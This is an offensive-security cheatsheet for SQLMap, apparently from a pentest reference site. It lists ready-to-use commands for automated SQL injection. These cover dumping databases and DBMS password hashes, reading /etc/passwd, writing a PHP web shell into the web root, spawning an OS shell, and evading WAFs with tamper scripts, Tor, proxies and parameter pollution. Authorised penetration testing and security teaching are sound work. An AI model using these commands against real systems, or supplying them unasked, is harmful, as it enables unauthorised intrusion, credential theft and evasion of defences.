SQLMap
A cheatsheet for SQLMap usage to automate SQL injection attacks, covering injection techniques, database enumeration, data extraction, OS exploitation, WAF bypass, and tamper script evasion against web applications.
Author: BobBuilder
HTTP Request Setup
GET Request
sqlmap -u "http://<domain>/?id=1"
POST Request
sqlmap -u "http://<domain>/" --data="id=1&name=test"
Raw HTTP Request
sqlmap -r <request_file>
Custom HTTP Method
sqlmap -u "http://<domain>/" --data="id=1" --method=PUT
Enumeration Arguments
Supported Techniques
--technique=BEUSTQ
B=Boolean-based, E=Error-based, U=Union, S=Stacked, T=Time-based, Q=Inline
Database Basic
--banner # DBMS banner
--current-user # Current DB user
--current-db # Current database
--is-dba # Check DBA privileges
--dbs # List databases
--tables -D <db> # List tables in a database
--columns -T <table> -D <db> # List columns in a table
--dump -T <table> -D <db> # Dump table data
--dump-all # Dump all data
--start=2 --stop=3 # Row range
--where="name LIKE 'admin%'" # Conditional dump
--exclude-sysdbs # Skip system DBs
--dump-format=html # Output format
Database Advanced
--schema # Full DB schema
--search -T <keyword> # Search table names
--search -C <keyword> # Search column names
--passwords # Dump DBMS user password hashes
--all # Full enumeration
--batch # Non-interactive mode
Full Auto Mode
sqlmap -u "http://<domain>/?id=1" --all --batch
Parameter Discovery
--crawl=3 # Crawl level
--forms # Detect HTML forms
-g "<google_dork>" # Use Google dork
Injection Tuning
--prefix="%'))" # Payload prefix
--suffix="-- -" # Payload suffix
--no-escape # Disable escaping
--no-cast # Disable data type casting
--union-cols=5 # Set UNION column count
--union-char='a' # Dummy filler char
--union-from=<table> # Force UNION FROM clause
--parse-errors # Show SQL errors
OS Exploitation
--is-dba # Confirm DBA privileges
--file-read="/etc/passwd" # Read remote file
--file-write="shell.php" # File to upload
--file-dest="/var/www/html/shell.php" # Destination path
--os-shell # Spawn OS shell
--technique=E # Error-based injection
--batch # Non-interactive shell setup
WAF/Filter Evasion
--csrf-token="csrf" # Auto-track CSRF tokens
--randomize=<param> # Randomize parameter
--eval="import hashlib; ..." # Dynamic values
--proxy="socks4://<ip>:<port>" # Use SOCKS proxy
--tor # Use Tor
--check-tor # Validate Tor
--skip-waf # Skip WAF detection
--random-agent # Use random User-Agent
UTF-16 Encoding Helper (Manual)
# Convert input to \u00XX format
print(''.join([f"\\u00{ord(c):02x}" for c in input('> ').strip()]))
Tamper Scripts
Usage
--tamper=between,randomcase
--list-tampers
Common Scripts
| Script | Description |
|---|---|
between |
Replaces >/= with BETWEEN/NOT BETWEEN |
base64encode |
Encodes payload in base64 |
randomcase |
Randomizes keyword casing |
space2comment |
Replaces spaces with /**/ |
space2dash |
Replaces spaces with --random\n |
space2hash |
Replaces spaces with #random\n |
modsecurityversioned |
Versioned comments around payload (MySQL) |
plus2concat |
Replaces + with CONCAT() |
percentage |
Converts keywords to %K%E%Y%W%O%R%D |
Miscellaneous Bypasses
Chunked Transfer
--chunked
HTTP Parameter Pollution (Manual)
sqlmap -u "http://<domain>/?id=1&id=UNION&id=SELECT&id=user&id=FROM&id=users"